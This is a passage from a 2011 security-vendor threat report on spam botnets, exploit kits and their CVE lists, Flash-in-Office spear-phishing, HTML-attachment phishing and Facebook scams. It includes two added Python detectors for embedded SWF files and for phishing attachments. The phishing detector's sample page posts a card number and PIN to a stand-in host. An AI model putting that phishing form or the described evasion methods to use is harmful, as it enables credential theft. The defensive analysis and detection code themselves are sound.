Security Labs Report: January – June 2011 Recap

CONTENTS

Introduction 3

Review of First Half (January to June) 2011 3

Key Points 3

Security Lab Statistics 4

Web Statistics 4

Spam Statistics 6

Spam 6

Spam Categories 7

Malicious Spam 8

Targeted Attacks 10

Combined Attacks: Adobe Flash and Microsoft Office Documents 10

Blended Threats and Exploit Kits 12

Meet the Exploit Kits 14

Popularity of Free Domains in Malicious Attacks 18

Phishing via HTML Attachments 20

Rustock Takedown 21

Facebook Scams Surge 22

Recommendations 27

Security Labs Report Page 2

INTRODUCTION

The M86 Security Labs team prepared this report, which covers key trends and developments in over the last six months.

M86 Security Labs is a group of security analysts specializing in email and Web threats, from spam to . They continuously monitor and respond to Internet security threats. The Security Labs’ primary purpose is to provide a value-added service to M86 customers as part of product maintenance and support. This service includes frequent updates to M86’s unique, proprietary anti-spam technology, SpamCensor, as well as Web and vulnerability updates to the M86 Secure Web Gateway products. The updates allow M86 customers to proactively detect and block new and emerging exploits, threats and malware.

M86 Security Labs analyzes spam and malware activity, and follows Internet security trends. The team is recognized in the industry and regularly reports on these issues, including newly discovered vulnerabilities and the exploits using them “in the wild.” Every day, the Security Labs team analyzes millions of distinct email messages, infected websites and malware reports. The results of these analyses, correlated with Web exploit and vulnerability research, provide M86 with a unique vantage point on Internet threats.

Data and analysis from M86 Security Labs is continuously updated and always accessible online at: http://www.m86security.com/labs.

You can find us on Twitter at: http://twitter.com/m86labs.

REVIEW OF FIRST HALF (JANUARY – JUNE) 2011

During this period, Web-based threats continued to grow more sophisticated. However, email threats such as spam decreased markedly following the takedown of major spam operations.

Key Points

• Many of the vulnerabilities targeted today are found in the Adobe and Java platforms. This highlights the fact that these applications often remain unpatched. Organizations and individuals should ensure that these software applications are patched promptly.
• Although spam volumes have declined since the closure of Spamit.com and the takedown of the Rustock botnet, spam remains a problem for most organizations.
• The volume of malicious spam has returned to previous levels. Attackers continue to craft more legitimate-looking messages in order to coax users into executing malicious files.
• Cybercriminals continue to experiment with combined attacks, evidenced by the recent spate of “spear-phishing” (targeted) attacks that used Microsoft Office document files with embedded Shockwave files that exploit vulnerabilities in Adobe Flash.
• There has been an increase in phishing attacks that include an HTML attachment, which is used to bypass anti-spam filters and the anti-phishing filters built into the browser.
• Facebook scams surged in the first half of 2011, as cybercriminals experimented with different ways to dupe social networkers into helping them earn a profit. One scam led users to trojans and fake anti-virus software for the Mac.

SECURITY LABS STATISTICS

Web Statistics

World Malware Map: Where is most malicious code being hosted?

Figure 1: Geo-location of Malicious Code Hosted on Servers in the First Half of 2011

The U.S. remained at the top of the list of locations where malicious code is hosted. However, the percentage decreased nearly 10% in the first half of 2011 to 32.3%, compared to 42.1% in the second half of 2010. China, often believed to be one of the major hosts of malicious code, saw its share double, up from 6.4% in the second half of 2010 to 12.7% in the first half of 2011. Since hosting the 2010 FIFA World Cup, South Africa dropped significantly, registering at only 0.3% in the first half of 2011, down from a high of 5.28% in the second half of 2010. If any correlation can be made between locations of malicious code hosts and countries that host major sporting events, the U.K. looks primed to be the next target, as the 2012 Olympic Games will be hosted there. Our analysis showed an increase already starting: the U.K. share rose from 3.34% in the second half of 2010 to 5.19% in the first half of 2011. We believe that this trend will continue as we get closer to the event in 2012.

Top 15 Most-observed Vulnerabilities

During the first half of 2011, anonymous feedback on observed threats from M86 filtering installations showed most threats were based on the following vulnerabilities:

| VULNERABILITY | DISCLOSED | PATCHED | 2H 2010 | +/- |
| --- | --- | --- | --- | --- |
| 1. Microsoft Internet Explorer RDS ActiveX | 2006 | 2006 | 1 | - |
| 2. Office Web Components Active Script Execution | 2002 | 2002 | 2 | - |
| 3. Adobe Reader util.printf() JavaScript Func() Stack Overflow | 2008 | 2008 | 7 | +4 |
| 4. Adobe Acrobat and Adobe Reader CollectEmailInfo | 2007 | 2008 | 5 | +1 |
| 5. Adobe Reader media.newPlayer | 2009 | 2009 | 10 | +5 |
| 6. Adobe Reader GetIcon JavaScript Method Buffer Overflow | 2009 | 2009 | 6 | - |
| 7. Internet Explorer Table Style Invalid Attributes | 2010 | 2010 | - | - |
| 8. Adobe Reader javascript this.spell.customDictionaryOpen | 2009 | 2009 | - | - |
| 9. Adobe Reader getAnnots() Javascript Function Remote Code Execution | 2009 | 2009 | - | - |
| 10. Java WebStart Arbitrary Command Line Injection | 2010 | 2010 | 15 | +5 |
| 11. Java Plugin Web Start Parameter | 2010 | 2010 | - | - |
| 12. Microsoft Internet Explorer Deleted Object Event Handling | 2010 | 2010 | 8 | -4 |
| 13. Real Player IERPCtl Remote Code Execution | 2007 | 2007 | 4 | -9 |
| 14. Microsoft Video Streaming (DirectShow) ActiveX | 2007 | 2009 | 3 | -11 |
| 15. Microsoft IE STYLE Object Invalid Pointer Reference | 2009 | 2009 | 14 | -1 |

The table above includes the placements from the second half of 2010, and the change in placement for each vulnerability. From the second half of 2010 to the first half of 2011, Adobe-based vulnerabilities rose in importance. In fact, Adobe vulnerabilities account for six out of the top 10 items observed. Another interesting fact is that Java-based vulnerabilities broke into the top 11. The “Java WebStart” vulnerability moved appreciably, up from number 15 to number 10 in only six months. As with Flash and Acrobat, Java-based vulnerabilities are of concern due to the universal use of this technology and the lack of updating or patching for many Java installations. A multitude of browsers are available, and new browser updates are being introduced regularly. Many browser vendors have adopted a rapid-release development cycle in order to deliver new features, enhancements and security updates to users. This process will further push cybercriminals to find vulnerabilities in Adobe products like Flash and Acrobat along with Oracle’s Java. Targeting a single application that is used with all browsers requires less effort.

Top 10 Most Popular Exploit Kits

In addition to tracking the most-observed vulnerabilities in the wild, we track the most popular exploit kits observed in the wild:

| EXPLOIT/TOOLKITS | 2H 2010 | +/- |
| --- | --- | --- |
| 1. Neosploit | 7 | +6 |
| 2. Phoenix | 2 | - |
| 3. Blackhole | - | - |
| 4. Incognito | - | - |
| 5. Eleonore | 1 | -4 |
| 6. Bleeding Life | - | - |
| 7. SEO Sploit | 8 | +1 |
| 8. CrimePack | - | - |
| 9. Intoxicated | - | - |
| 10. Siberia | - | - |

Our analysis suggests that most exploit kits last for a year on average. For instance, our second half 2010 report showed that the Eleonore exploit kit was the most popular kit used by cybercriminals. However, it has not been updated by the original developers in more than six months. The current instances of this exploit kit in the wild are actually a mutation of the latest “released” versions, generated by anonymous cybercriminals. Another interesting exploit kit, Incognito, was inspired by the Neosploit team. The first version of this kit was created from the Fragus exploit kit, which we mentioned in the previous report. The author of this kit upgraded it, added new exploits and implemented new obfuscation techniques. The latest version of the exploit kit was converted into a Malware-as-a-Service offering. It allows cybercriminals to control settings via a central control panel. These continuous updates are key factors for ensuring longer shelf lives of exploit kits. Like any software application, if they are not updated regularly, they become stale. A detailed overview of some of these exploit kits can be found later in this report.

Spam Statistics

Spam Volume Index

In 2011, the volume of spam remains subdued compared to historical levels, reflecting substantial changes in the underground spamming ecosystem. Spam volume dipped sharply towards the end of 2010, as spammers were affected by a series of botnet disruptions and affiliate program closures.

[Figure 2 chart: M86 Security Spam Volume Index (SVI), monthly from June 2009 to June 2011; y-axis 0 to 7000]

Figure 2: M86 Security Labs’ Spam Volume Index (SVI)

Our proxy for spam volume movements is the M86 Security Labs Spam Volume Index (SVI), which tracks changes in the volume of spam received by a representative bundle of domains. By June 2011, the SVI stood at around 2,000, which is less than half of the SVI during most of 2010. Several factors led to the slump in volume:

• Most significantly, Spamit.com was shut down in late September. Spamit.com was an underground affiliate program used by several spamming botnets. It was closely linked to the “Canadian Pharmacy” and other brands of bogus online pharmacies.
• Control servers for the Pushdo botnet (and its Cutwail spamming component) were disrupted in August 2010.
• The Mega-D botnet slowly ground to a halt as law enforcement authorities identified and pursued the operator in late 2010.
• The Bredolab botnet, which often installed spamming malware, was disrupted in October 2010.
• The Rustock botnet, already seriously impacted by the Spamit closure, was disabled by Microsoft in March 2011.

Correspondingly, spam as a percentage of total inbound email dropped from approximately 90% in September 2010 to 77% in June 2011; however, it still remains a substantial issue for organizations. Although spam volume is much lower than last year, it is growing once again. In the last few months we’ve seen an increasing trend in the SVI.

Spam Botnets

Where the Spam Comes From

The bulk of spam is emitted from botnets, which are networks of computers compromised by malware. M86 Security Labs monitors the spam output from major botnets by observing infected machines in a closed environment, and comparing behavior with incoming spam feeds to gauge the activity levels of each botnet. The spamming botnets are constantly in flux, reflecting the nature of the underground marketplace. Botnets morph and become obsolete, are replaced, taken down, and upgraded in response to market forces, competition and law enforcement. As of June 2011, eight botnets were responsible for 93% of spam monitored by M86 Security Labs. In the aftermath of the Spamit and Rustock closures, other smaller botnets, notably Donbot and Xarvester, have increased their market share. The chart below depicts spam by spambot type as a percentage of total spam.

[Figure 3 pie chart, Top Spam Botnets, June 2011: Donbot 22.4%, Lethic 17.4%, Cutwail1 12.5%, Maazben 12.2%, Xarvester 11.8%, Grum 9.3%, Other 6.9%, Cutwail3 5.3%, FesD 2.1%]

Figure 3: Spam by Spambot Type for June 2011

Spam Categories

A Shakeup in the Makeup of Spam Categories

The shakeup of the spam ecosystem also led to big changes in the types of programs being promoted by spam. Pharmaceutical spam has dropped markedly to just 39% from more than 80% at the beginning of the year. Other categories, notably dating, replicas and gambling spam, have risen to fill the gap. Phishing—as a percentage of spam—has now dropped to very low levels, around 0.1% or 1 in 1,000 spam messages.

[Figure 4 pie chart, Spam Categories, June 2011: Pharma 39.0%, Dating 21.4%, Replicas 18.5%, Gambling 15.7%, Other 1.5%, Software 0.7%, Adult 0.4%, Scams 0.4%, Diplomas 0.4%, Malware 0.2%]

Figure 4: Spam Categories for June 2011

These statistics reflect the changing nature of the affiliate programs that botnet operators use to earn money. The model works like this: sign up with an affiliate program, promote the product/website/links, and earn money for every successful sale.

[Figure 5 line graph, Spam Categories, January to June 2011: share of total spam (0% to 100%) per category by month, with series including Pharma, Replicas and Dating]

Figure 5: Spam Categories Line Graph from January 2011 to June 2011

The decline in pharmaceutical spam is interesting, because this has been a dominant spam category for years. Several factors are at play. First is the closure of Spamit, which was linked to the Glavmed affiliate program, one of the largest pharmaceutical affiliate programs. Second, the legal action taken by Microsoft during the Rustock takedown sent promoters of illegitimate pharmaceutical websites a strong message, perhaps making this option less attractive for spammers. Third, it may be that competing affiliate programs in other categories are now more financially attractive for the spammers.

Malicious Spam

Attachments and Blended Threats

The proportion of spam with malware attachments has risen since the beginning of the year, although this merely represents a return to more “normal” activity after an unusually quiet November-to-March period. Malicious spam can spike upwards sharply, and at times these spikes can represent 5% or more of total spam.

[Figure 6 chart: Spam with Malware Attachments as a percentage of total spam, 4 July 2010 to 4 June 2011; y-axis 0.0% to 7.0%]

Figure 6: Spam with Malware Attachments: Percent of Total Spam

Many of the campaigns we observed this year contained malware that downloads fake anti-virus software.

Figure 7: Fake Anti-virus Downloaded Through Malware Spread Via a Spam Campaign

In addition, we observed malicious spam campaigns that included PDF attachments—such as the one used in the campaign in Figure 9— claiming to be a receipt from Warner Music:

Figure 8: Malicious PDF Spam Campaign Attempting to Exploit the Adobe Geticon Vulnerability (CVE-2009-0927)

Targeted Attacks

Why Email as a Threat Vector Shouldn’t Be Ignored

The majority of attacks now originate from the Web. Whether these attacks infiltrate through legitimate website infections, malvertising or drive-by downloads, they have all contributed to this growing trend. As a result, email as a threat vector has been given less attention, despite the fact that email incidents continue to cause significant problems. One example from the first half of 2011 is the targeted attack against RSA, the security division of EMC. This email-based attack received little attention in comparison to other types of attacks on high-profile organizations such as Sony and government sites. RSA was the victim of a spear-phishing attack, which originated as an email to specific staff members claiming to be about the 2011 recruitment plan. This email contained an Excel file as an attachment. This file was not your average spreadsheet: it contained a Flash file that was used to exploit a zero-day vulnerability in Adobe Flash on the victim’s system. This attack had far-reaching implications, because RSA is the provider of two-factor authentication to defense contractors. One contractor, Lockheed Martin, was attacked months after this targeted attack.

Oak Ridge National Laboratory, a nuclear research facility funded by the United States Department of Energy, was also the victim of a targeted attack in April 2011. The attackers crafted a spear-phishing email disguised to look as though it had come from human resources. The email contained a blended threat—a link to a malicious Web page—which exploited a vulnerability in Microsoft’s Internet Explorer. Out of the 57 employees that clicked on the link, only two were infected, but this turned out to be more than enough to allow cybercriminals to exfiltrate a few hundred megabytes of data from the facility.

The data breach that occurred at email marketing firm Epsilon may also have been the result of a spear-phishing attack. Organizations continue to rely on email communications; hence the email vector is one that should be watched closely for attacks that involve social engineering. Companies must continue to evaluate how they communicate sensitive information such as employee benefits and recruitment plans. Internal communications must be designed well enough to allow users to discern the difference between a legitimate company communication and one crafted by a cybercriminal.

Combined Attacks: Adobe Flash and Microsoft Office Documents

Would You Like a .swf (Shockwave File) with That?

During the first half of this year, we began observing a new type of attack that relies on vulnerabilities in Adobe Flash and Microsoft Office files. The attacker leverages vulnerabilities found in Adobe Flash by inserting an Adobe Shockwave (.swf) file into a Microsoft Word document or Microsoft Excel spreadsheet. The two vulnerabilities involved are:

| COMMON VULNERABILITY ENUMERATION (CVE) | DESCRIPTION |
| --- | --- |
| CVE-2011-0609 | […] allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content, as demonstrated by a .swf file embedded in an Excel spreadsheet, and as exploited in the wild in March 2011 |
| CVE-2011-0611 | […] allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011. |

CVE-2011-0609 was the zero-day vulnerability used in the targeted attack against RSA in March of this year. Vulnerabilities targeting Adobe’s Flash platform are extremely common. Organizations often send documents to employees about various company policies and initiatives. By crafting Office documents with added shockwave files, and sending them out via spear-phishing attacks, cybercriminals can potentially wreak havoc on an organization. Here is an example of a malicious document that contains embedded Flash:

Figure 9: Flash 10 Information Found at 0x0A11

Figure 10: Flash Embedded at 0x02E08

We have seen these embedded Flash-in-Office files exploited in the wild over the last few months. We have also observed similar exploits written in the Metasploit Framework:

Figure 11: CVE-2011-0609 in the MetaSploit Framework

Figure 12: CVE-2011-0611 in the MetaSploit Framework

Many security solutions (such as anti-virus scanners) aren’t fully capable of separating the malicious Flash component embedded in the Office files, making them difficult to analyze. We believe that this trend of combining malicious shockwave files into Microsoft Office files will continue. We expect more vulnerabilities to be found and exploited in both Office and Flash platforms.
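As an added illustration of the analysis gap just described (this code is not from the M86 report), the Python scanner below locates SWF headers inside Office files, inflating OOXML zip members and scanning legacy OLE2 files as raw bytes; the sample carriers, the 0x0A11 offset mirroring Figure 9, and the version threshold are constructed assumptions.

```python
import io
import struct
import zipfile
import zlib

SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib-compressed, LZMA-compressed
MAX_SWF_VERSION = 40  # assumption: Flash 10/11 era SWFs are version <= 13; anything above is noise


def _plausible(data, pos, sig, version, length):
    """Sanity checks that separate a real SWF header from a chance 3-byte match."""
    if not 1 <= version <= MAX_SWF_VERSION or length < 8:
        return False
    if sig == b"FWS":
        # uncompressed: the declared length cannot exceed the bytes left in the carrier
        return length <= len(data) - pos
    if sig == b"CWS":
        # a zlib stream must start right after the 8-byte header
        tail = data[pos + 8:pos + 520]
        if len(tail) < 2:
            return False
        try:
            zlib.decompressobj().decompress(tail)
            return True
        except zlib.error:
            return False
    return True  # ZWS (LZMA): accepted on version/length sanity alone


def swf_headers(data, max_hits=32):
    """Return sorted (offset, signature, version, declared_length) tuples for
    every plausible SWF header found in *data*."""
    hits = []
    for sig in SWF_SIGNATURES:
        pos = data.find(sig)
        while pos != -1 and len(hits) < max_hits:
            hdr = data[pos:pos + 8]
            if len(hdr) == 8:
                version = hdr[3]
                (length,) = struct.unpack("<I", hdr[4:8])
                if _plausible(data, pos, sig, version, length):
                    hits.append((pos, sig.decode(), version, length))
            pos = data.find(sig, pos + 1)
    return sorted(hits)


def scan_office_blob(blob):
    """Scan an Office file held in memory and return {member: [hits]}.
    OOXML (.docx/.xlsx) is a zip, so each member is inflated and scanned;
    anything else (OLE2 .doc/.xls, RTF) is scanned as raw bytes under '<raw>'."""
    results = {}
    if blob[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for name in zf.namelist():
                hits = swf_headers(zf.read(name))
                if hits:
                    results[name] = hits
    else:
        hits = swf_headers(blob)
        if hits:
            results["<raw>"] = hits
    return results


def build_samples():
    """Constructed carriers for demonstration (no real exploit content): an
    OLE2-style blob with an uncompressed SWF at 0x0A11, the offset shown in
    Figure 9, and an OOXML-style zip with a zlib-compressed SWF in an OLE object."""
    body = b"\x00" * 20  # stand-in for the SWF body; only the header matters here
    fws = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(body)) + body
    cws = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)
    decoy = b"FWS" + b"\xff" * 5  # chance signature match that must fail the sanity checks
    ole = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + decoy  # OLE2 magic followed by the decoy
    ole += b"\x00" * (0x0A11 - len(ole)) + fws + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/embeddings/oleObject1.bin", b"\x00" * 100 + cws)
    return ole, buf.getvalue()


if __name__ == "__main__":
    for label, sample in zip(("legacy .doc", "OOXML .docx"), build_samples()):
        for member, hits in scan_office_blob(sample).items():
            for offset, sig, version, length in hits:
                print(f"{label}: {member} holds {sig} (SWF v{version}, {length} bytes) at 0x{offset:X}")
```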

Blended Threats and Exploit Kits

A Match Made in Heaven

Scammers have found a few social engineering sweet spots in recent months. One common tactic preys on those who sympathize with victims of natural disasters around the world. The earthquake in Japan that led to tsunamis and a nuclear meltdown was exploited in SEO poisoning attacks, social networking scams and malicious spam campaigns. By using sensational headlines, scammers coax users into clicking on the links in their blended threat attacks, which lead to malicious Web pages that can exploit client-side vulnerabilities.

Figure 13: Malicious Spam Campaign Leads to Malicious Page That Exploits Client-side Vulnerabilities

Another variant of this campaign was spoofed to look as though it had come from the social networking site, Twitter:

Figure 14: Fake Twitter Notification Informs User They Have New ‘Information’ Messages Regarding Japan’s Nuclear Crisis

Malicious LinkedIn Spam

In early June, we began to observe a blended threat spam campaign masquerading as a realistic-looking notification from LinkedIn. While this isn’t the first time we’ve seen spoofed social networking messages delivered in malicious spam campaigns, spammers continue to modify these messages to look more and more legitimate.

Figure 15: Malicious LinkedIn Blended Threat Campaign

In this case, users clicking on the “confirmation” button were led to a server hosting the Blackhole Exploit Kit, which then attempted to exploit vulnerabilities in Java, PDF readers and other client-side software applications.

Figure 16: Blackhole Exploit Kit Statistics Page

Java vulnerabilities continue to lead the way, accounting for 81% of the successful exploits from this campaign.

Meet the Exploit Kits

Analysis of Three of the Top Exploit Kits

In this section, we highlight the features of three top exploit kits and explain why cybercriminals use these particular kits.

NeoSploit (version 4)

The NeoSploit exploit kit has been around since 2007. It was abandoned after the release of version 3 due to financial problems. However, it made its triumphant return in early 2010. Over the last several months, the Neosploit exploit kit moved up to become the most popular exploit kit, which may be a result of several features that gave it an advantage over competitors. The NeoSploit team was the first to create an exploit kit that functions as a cloud-based service. The tool also manages to exploit a higher percentage of machines than the rest of the exploit kits we have analyzed, thanks to its dynamic obfuscation techniques.

Figure 17: NeoSploit Administrative Panel – Daily Stats

Figure 18: NeoSploit Exploit Page

Figure 19: Original Gmail Source Code

For more in-depth coverage of the Neosploit exploit kit see our blog post, “Shedding Light on the Neosploit Exploit Kit.”

Phoenix Exploit Kit (version 2.7)

The Phoenix Exploit Kit was the only exploit kit that remained in our top five exploit kit report after six months. This is likely because the author of the Phoenix Exploit Kit updates his product after several months, providing new exploits and obfuscation techniques to his customers. Some old exploits are purged. The latest version of the Phoenix Exploit Kit, version 2.7, contains the following exploits:

| EXPLOIT/VULNERABILITY | CVE |
| --- | --- |
| Java for Business JRE Trusted Method Chaining Remote Code Execution* | CVE-2010-0840 |
| Windows Help and Support Center Protocol Handler | CVE-2010-1885 |
| Integer overflow in the AVM2 abcFile parser in Adobe Flash Player | CVE-2009-1869 |
| Integer overflow in Adobe Flash Player 9 | CVE-2007-0071 |
| IEPeers Remote Code Execution | CVE-2009-0806 |
| Internet Explorer Recursive CSS Import | CVE-2010-3971 |
| PDF Exploit - collab.collectEmailInfo | CVE-2007-5659 |
| PDF Exploit - util.printf | CVE-2008-2992 |
| PDF Exploit - collab.geticon | CVE-2009-0927 |
| PDF Exploit - doc.media.newPlayer | CVE-2009-4324 |
| PDF Exploit - LibTIFF Integer Overflow | CVE-2010-0188 |

* Indicates a new addition

This kit is heavy on the Adobe vulnerabilities, with seven out of the 11 vulnerabilities focusing on Adobe Reader and Acrobat, as well as Adobe Flash.

Figure 20: Live Control Panel of Phoenix Exploit Kit version 2.7

As long as the author of the Phoenix Exploit Kit continues to create new versions of this pack, we expect to see it used by cybercriminals and remain at the top of the most popular exploit kits chart.

Blackhole Exploit Kit

The Blackhole exploit kit is the rising star among the cybercriminal toolkits. Like other kits, it uses common exploits:

| EXPLOIT/VULNERABILITY | CVE |
| --- | --- |
| Java for Business JRE Trusted Method Chaining Remote Code Execution* | CVE-2010-0840 |
| Java argument injection vulnerability in the URI handler in Java NPAPI plugin | CVE-2010-1423 |
| Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE | CVE-2010-0886 |
| Java JRE MixerSequencer Invalid Array Index Remote Code Execution | CVE-2010-0842 |
| Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll | CVE-2009-1671 |
| Windows Help and Support Center Protocol Handler Vulnerability | CVE-2010-1885 |
| PDF Exploit - collab.collectEmailInfo | CVE-2007-5659 |
| PDF Exploit - util.printf | CVE-2008-2992 |
| PDF Exploit - collab.geticon | CVE-2009-0927 |
| PDF Exploit - doc.media.newPlayer | CVE-2009-4324 |
| PDF Exploit - LibTIFF Integer Overflow | CVE-2010-0188 |

* Indicates a new addition

Figure 21: Live Control Panel of the Blackhole Exploit Kit

Note that the Blackhole kit comes equipped to exploit numerous vulnerabilities for Oracle’s Java platform (Figure 21). Today, the most successful vector of attack is the Java platform.

Underground Anti-virus Checking Sites

Another interesting feature used in the new exploit kits is the full integration with underground anti-virus checking sites.

Figure 22: Anti-virus Checking Included in the Blackhole Exploit Kit

The first toolkit to integrate underground anti-virus checking was the Siberia exploit kit. Figure 22 shows that the Blackhole exploit kit now comes equipped with this same anti-virus checking.

Figure 23: Underground Anti-virus Checking site, Virtest

Cybercriminals can create an account on underground anti-virus checking sites, such as scan4you and Virtest, as the Blackhole exploit kit integrates the login function into the kit. By going through this extra step, cybercriminals can ensure that malware is not being detected by the latest anti-virus solutions.

Popularity of Free Domains in Malicious Attacks

Some Cybercriminals Pinch Pennies While Deploying Attacks

Over the last six months, we’ve seen a dramatic increase in the popularity of free domain registration services as the hosts for malicious attacks. There has been a 250% increase in the usage of these sites since we began tracking them in the second half of 2010. Most cybercriminals prefer to follow the K.I.S.S. principle: keep it simple, stupid. In the case of domain name providers, you can’t do any better than free. While we’ve seen this increase in malicious domains on free domain registrars, we continue to find that legitimate, benign content is being hosted on sites using the same free domain providers. This makes the obvious approach of blacklisting the entire top-level domains unworkable.

Figure 24: Free Domain Registration Page on .cz.cc

Other popular free domains used for malware hosting, such as cx.cc, went from barely noticeable in the second half of 2010 to prominent in the first half of 2011.

Figure 25: Free Domain Registration Page on cx.cc Offers Free Hosting with PHP and MySQL Support

The cx.cc domain registrar provides cybercriminals with an added value of free hosting services, which includes PHP and MySQL support. This added bonus becomes very appealing to cybercriminals looking to host malware, including exploit kits. Other .cc domains, such as co.cc, are being leveraged in Facebook scam campaigns, showing that the trend of using free domain registrars is one that extends across the spectrum of cybercriminals.

Phishing Via HTML Attachments

Local Files Bypass Anti-spam and Browser Anti-phishing Methods

As we noted earlier in this report, phishing as a percentage of total spam has dropped to low levels. One ploy phishers have adopted is to attach an HTML file to the spam message (as opposed to the HTML being part of the email body). This better avoids anti-spam filters and the anti-phishing filters built into browsers. The HTML attachment, stored locally, is opened in the user’s browser. A form is then presented which is sent to a remote Web server using a POST request.

Figure 26: Phishers Attaching HTML File for Bank of America to Evade Anti-spam Filters

Once the user opens the HTML file, they are presented with the locally stored page, which is used to obtain the user’s credentials by asking him/her to “restore” their account.

Figure 27: Phishing for PayPal Credentials, Local Page is Undetected by the Browser’s Anti-phishing Filters
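As an added example (not code from the M86 report), the check below is what a mail gateway could run against the ploy just described: it extracts HTML attachments from a message and flags any form that POSTs a password field to a remote host, which a page opened from disk has no legitimate reason to do. The sample message, the filename restore.html and the host phish.invalid are constructed.

```python
import base64
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Record every <form> with its method, action and whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html_text):
    """Return forms that POST a password to an absolute http(s) URL."""
    scanner = _FormScanner()
    scanner.feed(html_text)
    hits = []
    for form in scanner.forms:
        url = urlparse(form["action"])
        remote = url.scheme in ("http", "https") and bool(url.netloc)
        if form["method"] == "post" and form["password"] and remote:
            hits.append({"action": form["action"], "host": url.netloc})
    return hits


def scan_message(raw_bytes):
    """Parse an RFC 822 message and return [(attachment_name, finding), ...]
    for every HTML attachment that carries a credential-harvesting form."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename() or ""
        looks_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        is_attachment = part.get_content_disposition() == "attachment" or bool(name)
        if not (looks_html and is_attachment):
            continue  # inline HTML bodies are a separate problem; this check targets attachments
        payload = part.get_payload(decode=True) or b""  # undoes base64 / quoted-printable
        text = payload.decode(part.get_content_charset() or "utf-8", errors="replace")
        for finding in suspicious_forms(text):
            findings.append((name, finding))
    return findings


# Constructed sample: a lure with an attached "restore your account" page whose
# form posts the entered PIN to a remote host (phish.invalid is a placeholder).
SAMPLE_HTML = """<html><body><h2>Restore your account</h2>
<form method="POST" action="http://phish.invalid/collect.php">
Card number: <input name="card"> PIN: <input type="password" name="pin">
<input type="submit" value="Restore">
</form>
<form action="/search"><input name="q"></form>
</body></html>"""

SAMPLE_EML = (
    b"From: Bank Alerts <alerts@example.com>\n"
    b"To: victim@example.org\n"
    b"Subject: Please restore your account\n"
    b"MIME-Version: 1.0\n"
    b'Content-Type: multipart/mixed; boundary="XX"\n\n'
    b"--XX\nContent-Type: text/plain; charset=utf-8\n\n"
    b"Open the attached form to restore your account.\n"
    b'--XX\nContent-Type: text/html; charset=utf-8; name="restore.html"\n'
    b'Content-Disposition: attachment; filename="restore.html"\n'
    b"Content-Transfer-Encoding: base64\n\n"
    + base64.b64encode(SAMPLE_HTML.encode()) + b"\n--XX--\n"
)

if __name__ == "__main__":
    for name, finding in scan_message(SAMPLE_EML):
        print(f"{name}: form POSTs a password to {finding['host']} ({finding['action']})")
```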

Rustock Botnet Takedown

The Demise of the King of Spams

On March 16, the Rustock botnet ground to a halt when the Microsoft Digital Crimes Unit, in conjunction with United States authorities, disabled the botnet’s infrastructure. The takedown was the result of a long investigation and resulted in the seizure of many control servers located in the US. Rustock was a major botnet over the last few years. At times during 2010, it was responsible for more than 50% of the spam observed by M86 Security Labs. Estimates of its size ranged up to 1 million infected nodes. Rustock almost always promoted pharmaceutical products, notably via the infamous “Canadian Pharmacy” brand websites. In fact, Rustock’s spam output declined substantially prior to the takedown. In September 2010, Rustock’s spam output dipped dramatically following the closure of Spamit.com, an underground spamming affiliate program linked to Glavmed and its Canadian Pharmacy “brand”. When Microsoft finally shut down the botnet in mid-March, Rustock’s spam output was only around 2-3% of total spam. Its final disappearance, then, did not have a huge impact on global spam levels.

[Figure 28 chart: Rustock as a percentage of total spam, monthly from January 2010 to March 2011; y-axis 0.0 to 60.0 percent of total spam]

Figure 28: Rustock’s Decline Following the SpamIt.com Closure and its Eventual Takedown by Microsoft

Nevertheless, the demise of Rustock is a significant victory. This huge spamming machine, capable of billions of spam messages daily, was allowed to operate largely unhindered for years. At this time, Microsoft is still attempting to pursue the individuals behind Rustock. This action sends a strong signal to spammers that their actions are not going to be tolerated, and they must be held accountable.

Facebook Scams Surge

More Money, More Malware

In the first half of 2011, social networking scams reached an all-time high. The various methods deployed by scammers showed how much they were experimenting: cybercriminals were trying to find a way to convince more users to click on scam links.

‘Likejacking’

Figure 29: Facebook User That Fell for a ‘Likejacking’ Scam About Pop-star Justin Bieber

At the beginning of the year, so-called “likejacking” scams (a variation on the term “clickjacking”) were used to hijack user clicks on fake YouTube pages to spread the scam across Facebook news feeds. These likejacking scams ran the gamut, mostly focusing on outrageous or interesting headlines, some of which involved celebrities and pop-stars, such as the “I can’t believe a GIRL did this because of Justin Bieber” likejacking scam.

Figure 30: Fake YouTube page. Clicking on the “Play” Button Will Result in the Click Being ‘Likejacked’

‘Photo-tagging’

In April, scammers began leveraging Facebook photos and albums to perform mass photo-tagging. They tagged hundreds of users in photos with a link in the description text that pointed them to rogue Facebook applications. Once installed, these applications would then tag the victims’ friends in the same photo.

Figure 31: Facebook Friends are Tagged in a Photo, Encouraging Users to Click on a Link

‘Commentjacking’

In May, scammers started leveraging the Facebook comments forms, released to website owners who wanted to integrate a commenting system on their blogs and websites. Scammers would place the Facebook comments forms on their scam pages and socially engineer users into leaving comments.

